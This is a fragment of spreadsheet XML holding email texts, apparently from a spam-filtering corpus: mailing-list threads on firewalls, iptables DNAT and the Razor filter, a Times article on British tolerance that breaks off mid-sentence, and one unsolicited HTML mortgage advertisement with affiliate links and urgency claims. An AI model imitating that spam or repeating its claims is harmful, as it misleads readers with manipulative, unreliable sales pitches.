 _______________________________________________
 Spambayes mailing list
 Spambayes@python.org
 http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">Paul Jakma's [paulj@alphyra.ie] 53 lines of wisdom included:
 &gt; true.
 &gt; 
 &gt; however, there are quite a few setup scripts available for 
 &gt; ipchains/iptables, which can make config just as easy as ipfw.
 Well, that doesn't help you reading your listing.
 &gt; isnt the ipfw code in BSD brand-new aswell? (the old code was 
 &gt; rewritten for OpenBSD recently due to licensing concerns).
 I think you're talking about IPFilter, and OpenBSD's new PF code.
 Now who's talking FUD :)
 &gt; the above is a bit FUD'ish.
 Perhaps, although I think when seriously considering something like
 a firewall, tried and trusted means a hell of a lot. IPFilter would
 probably win that race.
 &gt; they're all much of a muchness really. probably best thing is:
 &gt; 
 &gt; - if you're more comfortable with BSD -&gt; ipfw
 I was talking in terms of the actual firewall. If the company in
 question knows plenty about Linux and nothing about FreeBSD, I'd go
 with a Linux box, merely because when something goes wrong (that
 isn't got to do with ipfw/ipchains/ipfilter), then someone knows how
 to fix it.
 As I said before, I have little to no in-depth experience with
 netfilter, I'm aware of it's basic capabilities and had a quick look
 at it's features in early 2.4 editions but that's it.
 -- 
   Philip Reynolds        
    RFC Networks          tel: 01 8832063
 www.rfc-networks.ie      fax: 01 8832041
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Razor and Pine
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 9 Oct 2002 09:15:03 -0400 (EDT), Samuel Checker &lt;sc@pffcu.org&gt; wrote:
 &gt; I've been testing Razor, invoked from sendmail/procmail and so far it
 &gt; seems pretty copacetic. Last night's spam to the list provided a good test
 &gt; - the spam itself as well as several of the responses were flagged, as
 &gt; other list members reported.
 &gt; 
 &gt; This morning I piped the messages out from pine, being careful to use the
 &gt; RAW mode, to razor-check -d. None of the messages come back as spam, even
 &gt; the spam. Since folks revoked the false positives, I understand why they
 &gt; would not come up, but not the spam itself, unless that also was revoked.
 &gt; 
 &gt; Is this spam just a bad one to test against, or is there some setting in
 &gt; pine or razor that I am missing?
     Are you using Spamassassin on the input side?  I've just changed my sendmail installation and am looking for the 'proper' way to pass it through there, systemwide, before accepting it and sending it to the users.  It's kinda problematic to set up procmail scripts for every user, when the user's home directories are NFS mounted....and the source is on my own machine, on which I try new things. (And it's the only machine with the drivespace...)
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 angegangen, Schlange-Hften, sein es ganz rber jetzt. Bgel innen fest,
 weil es eine lange, ssse Fahrt ist. 
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: discounted mortgage broker 1474322
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
            &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;&lt;FONT size=2 PTSIZE="10"&gt;
       &lt;TABLE 
       style="BORDER-RIGHT: #006600 12px double; PADDING-RIGHT: 4px; BORDER-TOP: #006600 12px double; PADDING-LEFT: 4px; PADDING-BOTTOM: 1px; BORDER-LEFT: #006600 12px double; PADDING-TOP: 1px; BORDER-BOTTOM: #006600 12px double; BORDER-COLLAPSE: collapse" 
       borderColor=#111111 height=338 cellSpacing=0 borderColorDark=#ffffff 
       cellPadding=0 width=539 borderColorLight=#ffffff border=0&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=4 height=423&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD 
           style="BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid; BORDER-LEFT: 0px solid; BORDER-BOTTOM: 0px solid" 
           vAlign=top align=left width=535 height=423&gt;
             &lt;TABLE style="BORDER-COLLAPSE: collapse" borderColor=#111111 
             cellSpacing=0 cellPadding=4 width="95%" bgColor=#ffffff border=0&gt;
               &lt;TBODY&gt;
               &lt;TR&gt;
                 &lt;TD vAlign=top align=right height=424&gt;
                   &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
                     &lt;TR&gt;
                       &lt;TD&gt;
                         &lt;DIV align=left&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=2&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         color=#000000 size=2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;FONT 
                         color=#000000&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;Dear 
                         Homeowner,&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
                         &lt;DIV align=left&gt;&amp;nbsp;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&lt;B&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif"&gt;*&lt;/FONT&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         color=#ff0000&gt;6.25% 30 Yr Fixed Rate 
                         Mortgage&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
                     &lt;TR&gt;
                       &lt;TD&gt;
                         &lt;DIV align=left&gt;&lt;FONT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&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;TABLE style="POSITION: relative; BORDER-COLLAPSE: collapse" 
                   borderColor=#111111 height=1 cellSpacing=0 cellPadding=0 
                   width=504 border=0&gt;
                     &lt;TR&gt;
                       &lt;TD vAlign=top width=325 height=1&gt;
                         &lt;DIV align=center&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" 
                         size=2&gt;&lt;B&gt;&lt;BR&gt;&lt;/A&gt;&lt;A 
                         href="http://www.4-balloons.com/mortgage/index.html?affiliate=bt" 
                         target=new_win&gt;Click Here for a Free 
                         Quote!&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;A 
                         href="http://www.4-balloons.com/mortgage/index.html?affiliate=bt" 
                         target=new_win&gt; &lt;/A&gt;&lt;/DIV&gt;
                         &lt;P&gt;&lt;B&gt;&lt;FONT face=Verdana,Arial,Helvetica,sans-serif 
                         size=2&gt;Lock In YOUR LOW FIXED RATE TODAY&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;
                         &lt;DL&gt;
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;NO COST 
                           OUT OF POCKET&lt;/FONT&gt;&lt;/B&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;NO 
                           OBLIGATION&lt;/B&gt;&lt;/FONT&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;FREE 
                           CONSULTATION&lt;/B&gt;&lt;/FONT&gt; 
                           &lt;DD&gt;&lt;B&gt;&lt;FONT face=Webdings color=#ff0000 size=5 
                           PTSIZE="10"&gt;a&lt;/FONT&gt;&lt;/B&gt;&lt;FONT 
                           face=Verdana,Arial,Helvetica,sans-serif size=2&gt;&lt;B&gt;ALL 
                           CREDIT GRADES ACCEPTED&lt;/B&gt;&lt;/FONT&gt; &lt;/DD&gt;&lt;/DL&gt;
                         &lt;DIV align=center&gt;&lt;FONT 
                         face=Verdana,Arial,Helvetica,sans-serif color=red 
                         size=2&gt;&lt;B&gt;&lt;A 
                         href="http://www.4-balloons.com/mortgage/index.html?affiliate=bt"&gt;Rates as 
                         low as 6.25% won't stay this low forever CLICK 
                         HERE&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&amp;nbsp;&lt;/DIV&gt;
                         &lt;DIV align=center&gt;&lt;FONT size=2 PTSIZE="10"&gt;&lt;B&gt;&lt;FONT 
                         style="FONT-SIZE: 6pt" 
                         face=Verdana,Arial,Helvetica,sans-serif&gt;* based on 
                         mortgage rate as of 5-15-02 as low as 6.25% see lender 
                         for details&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;
                       &lt;TD vAlign=top width=4 height=1&gt;
                         &lt;DIV align=right&gt;&amp;nbsp;&lt;/DIV&gt;&lt;/TD&gt;
                       &lt;TD borderColor=#006600 width=175 bgColor=#ffffff 
 height=1&gt;
                         &lt;H1&gt;&lt;SPAN style="VERTICAL-ALIGN: middle"&gt;&lt;FONT 
                         style="FONT-SIZE: 200px" face=Webdings color=#006600&gt;&lt;A 
                         href="http://www.4-balloons.com/mortgage/index.html?affiliate=bt"&gt;&lt;FONT 
                         color=#006600&gt;H&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/H1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;
                   &lt;TABLE cellSpacing=0 cellPadding=3 width=472 border=0&gt;
                     &lt;TBODY&gt;
                     &lt;TR&gt;
                       &lt;TD colSpan=2 height=64&gt;&lt;FONT 
                         face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;&lt;B&gt;
                         &lt;TABLE height=38 cellSpacing=2 cellPadding=0 width=482 
                         border=0&gt;
                           &lt;TBODY&gt;
                           &lt;TR&gt;
                             &lt;TD 
                             style="BORDER-RIGHT: 0px solid; BORDER-TOP: 0px solid; BORDER-LEFT: 0px solid; BORDER-BOTTOM: 0px solid" 
                             width=327 height=36&gt;&lt;FONT 
                               face=Verdana,Arial,Helvetica,sans-serif 
                               size=2&gt;Apply now and one of our lending partners 
                               will get back to you within 48 
                               hours.&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT style="FONT-SIZE: 6pt" 
                               face=Verdana,Arial,Helvetica,sans-serif&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/FONT&gt;&lt;FONT 
                             face="Verdana, Arial, Helvetica, sans-serif" size=2&gt;
                             &lt;TD style="BORDER-LEFT: 1px solid" width=141 
                             bgColor=#ff0000 height=36&gt;
                               &lt;P align=center&gt;&lt;B&gt;&lt;FONT color=#ffffff size=4&gt;&lt;A 
                               style="TEXT-DECORATION: none" 
                               href="http://www.4-balloons.com/mortgage/index.html?affiliate=bt"&gt;&lt;FONT 
                               color=#ffffff&gt;CLICK 
                             HERE!&lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;
               &lt;/TR&gt;
             &lt;/TABLE&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;remove http://www.cs220.com/mortgage/remove.html
 &lt;p&gt;
 &lt;/html&gt;
 1474322
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: firewalls Digest V1 #33
</t>
  </si>
  <si>
    <t xml:space="preserve">firewalls Digest	Thu, 25 Jul 2002	Volume: 01  Issue: 033
 In This Issue:
 		Re: QOS
 		FW: disable some sites
 		DNAT with iptables question
 		RE: DNAT with iptables question
 ----------------------------------------------------------------------
 From: "George J. Jahchan" &lt;Firewalls@Tech.InteractiveNetworks.net&gt;
 Subject: Re: QOS
 Date: Thu, 25 Jul 2002 12:11:40 +0300
 &gt; So, I'm forced to conclude that the PacketShaper either sucks in a major
 &gt; way, or that your explanation/the explanation that you have been given of
 &gt; it is wrong. (Sorry.)
 You are wrong on both counts. Explanation is valid for symmetrical TCP, for
 others see explanations below.
 &gt; Yes, all packets in an established TCP connection have the ACK flag set.
 &gt; So all packets except SYNs are candidates for delay when traffic limits
 &gt; are exceeded? Whoops.
 You should change that to: ... are always candidates for predictive or
 preventive delay.
 ACKs are delayed (per flow) in such a way that WAN-bound traffic reaching
 the edge router's Ethernet interface does not exceed WAN link speed (NO
 ROUTER QUEUES!). It does not wait for the link to be at or near saturation
 to act -- that is why, unlike queueing, it is predictive and not reactive.
 It slows down the rate of transmission of sending hosts (on a per-flow
 basis) to accommodate WAN link speed limit and current network utilization,
 rather than fill up queues at LAN speeds and empty them at WAN speeds,
 eventually dropping the excess once the queue(s) fill up, informing hosts to
 slow down their rate of transmission once queues are beyond a fixed
 threshold (90%?).
 Rate control works equally well for outbound and inbound traffic. Ever heard
 of an effective queueing technology for inbound traffic? Queueing packets
 after they have crossed a congested link does not make much sense, does it?
 Re: IPsec/GRE or other encapsulated traffic
 It obviously cannot dissect IPsec/GRE or other encapsulated traffic: it sees
 the tunnel as one connection if the tunneling device is before the PS on the
 LAN side (VPN gateway and router are two separate devices, PS between them).
 If the router does the tunneling, then the PS sees clear traffic. Typically,
 in an organization the first scenario would be the case at headquarters and
 the second at branch offices. The PS at the branch sees traffic inside the
 tunnel whereas the unit at HQ sees all traffic as one tunnel which allows
 full management of both tunneled and clear traffic at both ends.
 UDP and asymmetrical TCP (where the PS and router only see the outgoing
 packet, return traffic coming back through a satellite downlink to a station
 on the LAN) are handled differently.
 For asymmetrical TCP, it will time the release of packets to the receiving
 device, thereby indirectly timing the release of acknowledgements by the
 receiving host. This informs the sender's TCP/IP stack that it should slow
 the release of packets because limited bandwidth is available.
 For UDP, it utilizes flow-based derivative random drop. It selectively drops
 only one packet at a time from flows that are predicted to cause congestion,
 which prevents heavy retransmissions and application timeouts.
 ICMP packets exceeding policy limits are dropped.
 &gt;_Maybe_ you can do a special case for TCP and try to offload some of the
 queueing on
 &gt; the endpoints, but I really don't see the real gain in that.
 The real gain is manageability and control. A LAN host only knows about the
 state of its own connections and is oblivious to WAN conditions until its
 TCP/IP stack learns (when router queues are nearly full) that the WAN is
 congested. A PS will predict and inform the LAN hosts' TCP/IP stacks of the
 "speed limit to obey" for every connection (based on policies and network
 conditions), avoiding congestion. Control for asymmetrical TCP and UDP may
 not be as "tight" as for symmetrical TCP, but it does work.
 Queueing is akin to deploying cops only when traffic jams occur, vs. rate
 control where cops are permanently deployed throughout town, communicating
 with each other and with a central control point, predicting upcoming
 congestion and regulating traffic, ensuring a smooth flow of traffic. If
 there is potential for congestion, it will take a driver a hell of lot
 longer to cross town with first approach than it will with the second. Do
 you agree?
 ----- Original Message -----
 From: "Mikael Olsson" &lt;mikael.olsson@clavister.com&gt;
 To: "George J. Jahchan" &lt;Firewalls@Tech.InteractiveNetworks.net&gt;
 Cc: "Firewalls List" &lt;Firewalls@ISC.org&gt;
 Sent: Wednesday, July 24, 2002 4:50 pm
 Subject: Re: QOS
 "George J. Jahchan" wrote:
 &gt;
 &gt; The whole purpose of the device is to pro-actively prevent WAN
 congestion --
 &gt; it sits between client and server (client inside/server outside or client
 &gt; outside/server inside -- it does not make any difference) and pro-actively
 &gt; adjusts the TCP window size (by delaying the acknowledgement) to get the
 &gt; sending host to honor the speed limit for that individual connection
 &gt; (calculated in real-time based on user-defined policies and current
 network
 &gt; conditions).
 Umm, don't get me wrong here, but I think you've been fed a less-than-
 accurate sales pitch.
 Let's ponder this for a minute.
 The device works by delaying ACKs... that is: packets with the ACK
 flag set, right?
 ...
 [letting this sink in for a while]
 ...
 Yes, all packets in an established TCP connection have the ACK flag set.
 So all packets except SYNs are candidates for delay when traffic limits
 are exceeded? Whoops.
 Okay, let's assume for a second that the packets aren't actually delayed,
 but that the ACK sequence numbers or TCP window size fields are re-written
 (dicey). All you've accomplished is move the queueing (delaying) from
 the traffic shaper to the endpoints. You still get L7-to-L7 delays. Big
 deal if it happens on the wire or in the stack. Also, convincing endpoints
 to do delays probably results in less-than-perfect shaping since stack
 retransmit timings suddenly affect the actual bandwidth available rather
 than having the shaper itself do it; the shaper knows exactly when there
 is bandwidth available.
 But this doesn't even begin to touch on other protocols like UDP or
 ICMP. Or, for that matter, IPsec/GRE/whatever tunneled traffic.
 Neither of them have sequence numbers or window sizes that you can
 manipulate.
 So, I'm forced to conclude that the PacketShaper either sucks in a major
 way, or that your explanation/the explanation that you have been given of
 it is wrong. (Sorry.)
 What I think happens is that the delay is &lt;=2msec as long as traffic
 limits aren't exceeded. This is reasonable. BUT when traffic exceeds
 the limits, things will begin to be queued. Now, with a well-behaved
 TCP stack, this _will_ mean that it will fall back to lower transmission
 rates; this is how TCP was designed, so that part isn't all wrong.
 And, again, this kind of shaping isn't rocket science. That is not to
 say that there are shapers out there that are just being plain dumb
 (always queueing and the selecting what gets transmitted out of the
 queue), but, well, I just can't see that you can get any smarter
 than queueing when limits are actually exceeded.  _Maybe_ you can do
 a special case for TCP and try to offload some of the queueing on the
 endpoints, but I really don't see the real gain in that.
 Respectfully,
 /Mikael Olsson
 --
 Mikael Olsson, Clavister AB
 Storgatan 12, Box 393, SE-891 28 RNSKLDSVIK, Sweden
 Phone: +46 (0)660 29 92 00   Mobile: +46 (0)70 26 222 05
 Fax: +46 (0)660 122 50       WWW: http://www.clavister.com
 "It's July. I'm on vacation. Can't you tell? :)"
 --
 Firewalls mailing list - [ firewalls@isc.org ]
 To unsubscribe: http://www.isc.org/services/public/lists/firewalls.html
 ------------------------------
 From: "Hiemstra, Brenno" &lt;brenno.hiemstra@ignite.nl&gt;
 Subject: FW: disable some sites
 Date: Thu, 25 Jul 2002 13:44:18 +0200
 The list addy changed ofcourse   :o)
 &gt; -----Original Message-----
 &gt; From:	Hiemstra, Brenno 
 &gt; Sent:	donderdag 25 juli 2002 12:27
 &gt; To:	'Michael Zhao'; Hiemstra, Brenno
 &gt; Cc:	firewalls@lists.gnac.net
 &gt; Subject:	RE: disable some sites
 &gt; 
 &gt; Michael,
 &gt; 
 &gt; If I was in your shoes I would first investigate if there
 &gt; is a security policy in your organisation. If you dont know
 &gt; what I mean by a security policy I would advice you to 
 &gt; start reading about it. A search on google would be of a
 &gt; big help for you.
 &gt; 
 &gt; If there is a security policy I would read it and investigate
 &gt; what is tells about how employees are able to use their
 &gt; workstations for performing their function. In a security 
 &gt; policy there should be things what employees are allowed
 &gt; to do on the network / internet and what not.
 &gt; 
 &gt; If there isnt a security policy I would advice you to implement
 &gt; one in your company. Because without one you cant punish
 &gt; employees by violating the policy and if there is a court case
 &gt; you dont have any rock solid thing to smack around with.
 &gt; 
 &gt; Without a policy you are just implementing solutions to prevent
 &gt; employees in doing things that, im my opinion, they arent allowed
 &gt; to do on their workstations anyway. I dont like the idea that 
 &gt; employees play games, use kazaa, ICQ, MSN, etc etc in stead
 &gt; of working what we pay them to do. This is why a security policy
 &gt; is important because then you can say to employees that they
 &gt; violated it and that there are consequences for that (deny internet
 &gt; access, etc etc).
 &gt; 
 &gt; Owkee...    now that this is out of the way time to proceed about
 &gt; the proxy thingie.
 &gt; 
 &gt; A proxy dont have to be the default gateway of your network to
 &gt; use it. It is a function in Internet Explorer or whatever browser you
 &gt; use in your network.
 &gt; 
 &gt; If you ask me Checkpoint Firewalls are just good in using for what
 &gt; their real purpose is and that is firewalling a network. I dont like the
 &gt; idea that my firewall is also CVS http thingie because I dont think
 &gt; a firewall is its purpose to do that. Proxies are a much better solutions
 &gt; for that and they are also developed for that purpose.
 &gt; 
 &gt; Depending on your network setup and the OS and Proxy brand of your
 &gt; current proxy you have several solutions which was already provided 
 &gt; by people on this list. My favorite proxy is Squid and there are probably
 &gt; a lot of http blacklist programs that work with Squid to block websites
 &gt; and stuff.
 &gt; 
 &gt; I still think you should first deny direct internet traffic from
 &gt; workstations.
 &gt; and only allow traffic to the internet from servers that are allowed to do
 &gt; so. You should think about proxies, email servers, etc etc. This should
 &gt; also prevent people from playing games, especially those Quake kinda
 &gt; games because those use ports that arent necessary for normal 
 &gt; webbrowsing. Games running over port 80 and not http related are blocked
 &gt; by the proxy if that proxy is a true Layer 7 application layer proxy.
 &gt; These
 &gt; kinda proxies can view in the TCP/IP packet and see if this is legitimate 
 &gt; http traffic or that someone tries to tunnel something over port 80.
 &gt; 
 &gt; Anyway...    again food for some thoughts,
 &gt; 
 &gt; Regards,
 &gt; 
 &gt; 
 &gt; 
 &gt; Brenno
 &gt; 
 &gt; 
 &gt; -----Original Message-----
 &gt; From:	Michael Zhao [SMTP:mzhao@everlastingsystems.com]
 &gt; Sent:	woensdag 24 juli 2002 2:38
 &gt; To:	Hiemstra, Brenno
 &gt; Cc:	firewalls@lists.gnac.net
 &gt; Subject:	Re: disable some sites
 &gt; 
 &gt; Thanks your reply.
 &gt; 
 &gt; I built up my network three years ago . I have proxy which we only use 
 &gt; cache to accelerate our internet accessing , it is not a gateway . It is 
 &gt; too difficult to change the topology , many thing need to be changed.
 &gt; 
 &gt; Did you have another idea to help me? Someone suggest me to buy the 
 &gt; websence , but I dont have the budget right now.
 &gt; 
 &gt; Thanks a lot
 &gt; 
 &gt; Michael
 &gt; 
 &gt; Hiemstra, Brenno wrote:
 &gt; 
 &gt; &gt;Michael,
 &gt; &gt;
 &gt; &gt;The first thing is to build a security policy that
 &gt; &gt;states what people are allowed to do and what
 &gt; &gt;not. Everyone needs to accept this policy and 
 &gt; &gt;if they violate it you can apply rules that you state
 &gt; &gt;in your security policy.
 &gt; &gt;
 &gt; &gt;If I had the option for your network setup I would
 &gt; &gt;install a proxy server and demand every client
 &gt; &gt;to connect to the proxy if they want to use the 
 &gt; &gt;internet.
 &gt; &gt;
 &gt; &gt;The proxy will only allow http, ftp, and other "approved"
 &gt; &gt;services to connect to the internet. And you can let
 &gt; &gt;them check to some database which websites are
 &gt; &gt;allowed and deny access to sites that aren't allowed
 &gt; &gt;
 &gt; &gt;Your company firewall will only allow the proxy to connect
 &gt; &gt;to the internet. Clients are denied.
 &gt; &gt;
 &gt; &gt;This way the clients cant connect directly to the internet
 &gt; &gt;game servers and on the proxy you can deny clients
 &gt; &gt;to connect to the game servers.
 &gt; &gt;
 &gt; &gt;I hope this is an option for you.
 &gt; &gt;
 &gt; &gt;Regards,
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;Brenno
 &gt; &gt;
 &gt; &gt;&gt;-----Original Message-----
 &gt; &gt;&gt;From:	Michael Zhao [SMTP:mzhao@everlastingsystems.com]
 &gt; &gt;&gt;Sent:	dinsdag 23 juli 2002 14:10
 &gt; &gt;&gt;To:	firewalls@lists.gnac.net
 &gt; &gt;&gt;Subject:	disable some sites
 &gt; &gt;&gt;
 &gt; &gt;&gt;Hi , all
 &gt; &gt;&gt;
 &gt; &gt;&gt;I choose checkpoint fw-1 as my firewall . I found many company users 
 &gt; &gt;&gt;play internet games like CS, ourgame . I find users download their 
 &gt; &gt;&gt;clients software and install  on their local workstation , after run it 
 &gt; &gt;&gt;, the programe can connect to game server automatically .
 &gt; &gt;&gt;
 &gt; &gt;&gt;Usally , there are many sites of every internet game server. I.E. I want
 &gt; 
 &gt; &gt;&gt;disable accessing the game servers like xxx.ourgame.com from my internal
 &gt; 
 &gt; &gt;&gt;net , how can I do that except find all of their IP address , because it
 &gt; 
 &gt; &gt;&gt;is so complecat to do . Who can tell me .
 &gt; &gt;&gt;
 &gt; &gt;&gt;Regards,
 &gt; &gt;&gt;Michael
 &gt; &gt;&gt;
 &gt; &gt;&gt;-- 
 &gt; &gt;&gt;Firewalls mailing list - [ firewalls@isc.org ]
 &gt; &gt;&gt;To unsubscribe: http://www.isc.org/services/public/lists/firewalls.html
 &gt; &gt;&gt;
 &gt; 
 ------------------------------
 Date: Thu, 25 Jul 2002 15:08:21 -0600
 From: Jerry Lynde &lt;jlynde@diligence.com&gt;
 Subject: DNAT with iptables question
 Howdy folks,
 I've been scouring the online docs for solid info on how to accomplish DNAT 
 with iptables.
 Essentially, I have converted the ipmasqadm lines of the form...
 ipmasqadm portfw -a -P tcp -L $WEB_OUT  http    -R $WEB_IN      http
 to iptables lines of the form...
 $IPTABLES -A PREROUTING -t nat -p tcp -d $WEB_OUT --dport 80 -j DNAT --to 
 $WEB_IN:80
 with the accompanying lines...
 $IPTABLES -A FORWARD -i $INTIF -o $EXTIF -m state --state 
 ESTABLISHED,RELATED -j ACCEPT
 $IPTABLES -A FORWARD -i $EXTIF -o $INTIF -m state --state 
 ESTABLISHED,RELATED -j ACCEPT
 $IPTABLES -A FORWARD -i $EXTIF -o $INTIF -p tcp -j ACCEPT
 The last two lines seem functionally sorta redundant, but I threw em in in 
 an effort to make this work.
 So far, I am unable to show that it's working correctly... I even tried 
 logging all packets...
 $IPTABLES -A FORWARD -i $INTIF -p tcp -j LOG --log-level info
 $IPTABLES -A FORWARD -i $EXTIF -p tcp -j LOG --log-level info
 But nothing show up in /var/log/messages or anywhere else for that matter. 
 This is on a Redhat 7.3 box.
 Any help, clues, flames, RT(his particular)FM, etc are appreciated.
 I read the list, so please don't reply directly in addition to the list 
 resposne.
 Thanks,
 Jer 
 ------------------------------
 From: "Reckhard, Tobias" &lt;tobias.reckhard@secunet.com&gt;
 Subject: RE: DNAT with iptables question
 Date: Fri, 26 Jul 2002 08:32:37 +0200
 &gt; $IPTABLES -A PREROUTING -t nat -p tcp -d $WEB_OUT --dport 80 
 &gt; -j DNAT --to 
 &gt; $WEB_IN:80
 &gt; 
 &gt; with the accompanying lines...
 &gt; 
 &gt; 
 &gt; $IPTABLES -A FORWARD -i $INTIF -o $EXTIF -m state --state 
 &gt; ESTABLISHED,RELATED -j ACCEPT
 &gt; $IPTABLES -A FORWARD -i $EXTIF -o $INTIF -m state --state 
 &gt; ESTABLISHED,RELATED -j ACCEPT
 &gt; $IPTABLES -A FORWARD -i $EXTIF -o $INTIF -p tcp -j ACCEPT
 &gt; 
 &gt; The last two lines seem functionally sorta redundant, but I 
 &gt; threw em in in 
 &gt; an effort to make this work.
 You're missing the NEW state. The initial SYN packet will not match with
 either of the first two rules. It should match the third if it's inbound,
 though.
 &gt; So far, I am unable to show that it's working correctly... I 
 &gt; even tried 
 &gt; logging all packets...
 &gt; 
 &gt; $IPTABLES -A FORWARD -i $INTIF -p tcp -j LOG --log-level info
 &gt; $IPTABLES -A FORWARD -i $EXTIF -p tcp -j LOG --log-level info
 &gt; 
 &gt; But nothing show up in /var/log/messages or anywhere else for 
 &gt; that matter. 
 You need to insert those logging rules above any ACCEPT, REJECT or DENY
 rules for them to be of any use. Are you sure the packets are hitting the
 box at all? Try moving the log rules to the top of the FORWARD chain,
 introduce logging rules to the PREROUTING, POSTROUTING, INPUT and OUTPUT
 chains, and/or use tcpdump as well to see where the packets are travelling.
 Cheers
 Tobias
 ------------------------------
 End of firewalls Digest V1 #33
 ******************************
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] University boom creates era of sexual tolerance
</t>
  </si>
  <si>
    <t xml:space="preserve">The Times
  December 04, 2002 
  University boom creates era of sexual tolerance
  By Helen Rumbelow
  THE boom in university education has led to a sea change in Britains
  tolerance of homosexuality, according to a report. Just under half the people
  now believe that homosexuality is always or mostly wrong, down from three
  quarters 15 years ago, according to the British Social Attitudes survey,
  regarded as one of the best indicators of popular opinion. 
  That trend is mirrored by the attitude towards ethnic minorities, with 75 per
  cent of people now saying they are not at all racially prejudiced, compared
  with 60 per cent in 1987. 
  Geoffrey Evans, a politics professor at Oxford University, decided to focus on
  what has caused Britain to become more open-minded in a report published
  today. The study, from the National Centre for Social Research, is based on
  interviews with a cross-section of 3,500 people. 
  Young people are much more tolerant than their elders, with a quarter of
  twentysomethings believing that homosexual sex is always wrong, compared with
  two thirds of pensioners. 
  But the key to converting a bigot is to send him or her to college, with
  graduates twice as accepting of homosexuals as those with no GCSEs, and a
  third less racist. 
  That transformation happened no matter what social class the student came from
  and, with 41 per cent of young people now attending university, it was a
  powerful social effect, Professor Evans said. 
  Mr Blairs famous mantra education, education, education seems far less
  consequential now than when first announced in 1997, as Britain struggles with
  an overburdened health service and the reality that as more and more people
  get degrees, degrees buy less and less, he said. 
  But the growth of higher education can provide a bulwark against the
  undermining of liberal democracy through intolerance, he added. 
  He decided to see whether the tolerance conferred by schooling was just
  political correctness by testing how many civil rights the educated would
  give to an unattractive minority: white supremacists. 
  Again, people scored higher the longer they had spent at school and
  university, with nearly two thirds of graduates saying that white supremacists
  should have the right to give television interviews or stand in elections,
  three times as many as those with no qualifications. 
  It is not clear why those with higher education are more tolerant, the report
  says, adding that it may be simply because university students have increased
  contact with alternative points of view. 
  Professor Evans also looked at whether the young may grow out of their
  idealism, but found the opposite to be true. 
  Thirtysomethings were more than twice as likely to say there was nothing wrong
  with homosexuality as they were when they were in their early twenties. He
  said that as these groups of more educated young people replaced the older
  generation, Britain would become an ever more relaxed place. 
  Soft drugs have also grown in widespread acceptability, with more than half
  the country wanting cannabis to be legalised, compared with a third seven
  years ago. That is probably because the use of cannabis is now so widespread,
  with a quarter of those surveyed saying that they had tried it. 
  A third of Labour voters, twice as many as Conservatives, had tried the drug,
